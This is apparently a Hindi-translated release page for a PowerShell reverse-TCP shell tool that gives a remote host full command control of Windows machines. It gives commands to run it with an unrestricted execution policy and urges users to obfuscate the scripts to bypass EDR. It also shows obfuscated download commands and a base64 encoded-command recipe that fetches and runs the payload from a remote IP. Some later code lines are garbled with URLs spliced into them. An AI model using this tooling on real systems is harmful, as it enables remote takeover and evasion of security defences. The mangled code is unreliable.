अपडेट पर वापस जाएँ
New releaseAug 16, 2026

powershell-reverse-tcp v5.0

रिमोट होस्ट के साथ संवाद करने के लिए PowerShell स्क्रिप्ट्स।

साझा करें

पावरशेल रिवर्स टीसीपी

दूरस्थ होस्ट के साथ संचार के लिए पावरशेल स्क्रिप्ट्स।

दूरस्थ होस्ट का क्लाइंट और सभी अंतर्निहित सिस्टम कमांड पर पूर्ण नियंत्रण होगा।

इन पर आधारित शेल देखें:

  • यहाँ Invoke-Expression पावरशेल कमांड,
  • यहाँ प्रोसेस पाइप्स।

विंडोज 10 एंटरप्राइज OS (64-बिट) पर पावरशेल v5.1.19041.2673 के साथ परीक्षण किया गया।

शैक्षिक उद्देश्यों के लिए बनाया गया। मुझे उम्मीद है कि यह मदद करेगा!

इस रिपॉजिटरी में ज्ञात हस्ताक्षर होने लगे हैं और मेरे पास हर बार नई स्क्रिप्ट अपलोड करने का समय नहीं है, इसलिए आपको इन स्क्रिप्ट्स को स्वयं अस्पष्ट करना चाहिए।

भविष्य की योजनाएँ:

  • प्रोसेस पाइप्स पर आधारित अधिक शेल, और उन्हें और अनुकूलित करना।

विषय सूची

कैसे चलाएँ

स्क्रिप्ट्स में आवश्यकतानुसार IP पता और पोर्ट नंबर बदलें।

पावरशेल को \src\invoke_expression\original\ या \src\process_pipes\original\ से खोलें और नीचे दिखाए गए कमांड चलाएँ।

निष्पादन नीति सेट करें:```pwsh Set-ExecutionPolicy Unrestricted

स्क्रिप्ट चलाएँ:```pwsh
.\powershell_reverse_tcp.ps1

या, निम्नलिखित कमांड को PowerShell या Command Prompt से चलाएँ:```pwsh PowerShell -ExecutionPolicy Unrestricted -File .\powershell_reverse_tcp.ps1

## PowerShell स्क्रिप्ट को अस्पष्ट करें

EDR और अन्य सुरक्षा तंत्रों को बायपास करने का प्रयास करें, अपनी स्क्रिप्ट को अस्पष्ट करके। आप नीचे दिए गए उदाहरणों में ऐसे अस्पष्टीकरण देख सकते हैं।

मूल PowerShell कमांड:```pwsh
(New-Object Net.WebClient).DownloadFile($url, $out)

अस्पष्ट PowerShell कमांड:```pwsh & (GCM *ke-E*) '(& (GCM ew-O) NET.WEBCLIENT)."DOWNLOADFIL`E"($url, $out)'

**मूल PowerShell स्क्रिप्ट [यहाँ](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/original/powershell_reverse_tcp.ps1) और पूरी तरह से अस्पष्टीकृत स्क्रिप्ट [यहाँ](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/obfuscated/invoke_obfuscation/powershell_reverse_tcp_obfuscated.ps1) देखें।**

[मैन्युअल अस्पष्टीकरण](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/obfuscated/powershell_reverse_tcp_manual.ps1) के बाद, मूल PowerShell स्क्रिप्ट को [Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation) के साथ अस्पष्टीकृत किया गया था। लेखक को श्रेय!

अतिरिक्त अस्पष्टीकरण तकनीकों और विधियों के लिए इंटरनेट पर खोजें।

P.S. चूंकि PowerShell लगातार अपडेट हो रहा है, कुछ रेगुलर एक्सप्रेशन (जैसे `*ke-E*`) एक ही एक्सप्रेशन से मेल खाने वाली कई विधियों के कारण अपवाद फेंकना शुरू कर सकते हैं, इसलिए एक्सप्रेशन को थोड़ा बेहतर निर्दिष्ट करने की आवश्यकता होगी।

### PowerShell एन्कोडेड कमांड

एक PowerShell स्क्रिप्ट से PowerShell एन्कोडेड कमांड उत्पन्न करने के लिए, निम्नलिखित PowerShell कमांड चलाएँ:

$text = "(New-Object System.Net.WebClient).DownloadString('http://192.168.8.119/powershell_reverse_tcp.txt')" $bytes = [System.Text.Encoding]::Unicode.GetBytes($text) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand

[Convert]:https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/:ToBase64String(%5BText.Encoding%5D::Unicode.GetBytes(%5BIO.File%5D::ReadAllText($script)))
```
PowerShell एन्कोडेड कमांड को डीकोड करने के लिए, निम्नलिखित PowerShell कमांड चलाएँ:```pwsh
[Text.Encoding]:https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/:Unicode.GetString(%5BConvert%5D::FromBase64String($command))
```
यदि आप कोई कलाकृतियाँ पीछे नहीं छोड़ना चाहते हैं तो नीचे दिए गए एक-लाइनर्स का उपयोग करें।

---
```

श्रेणियाँ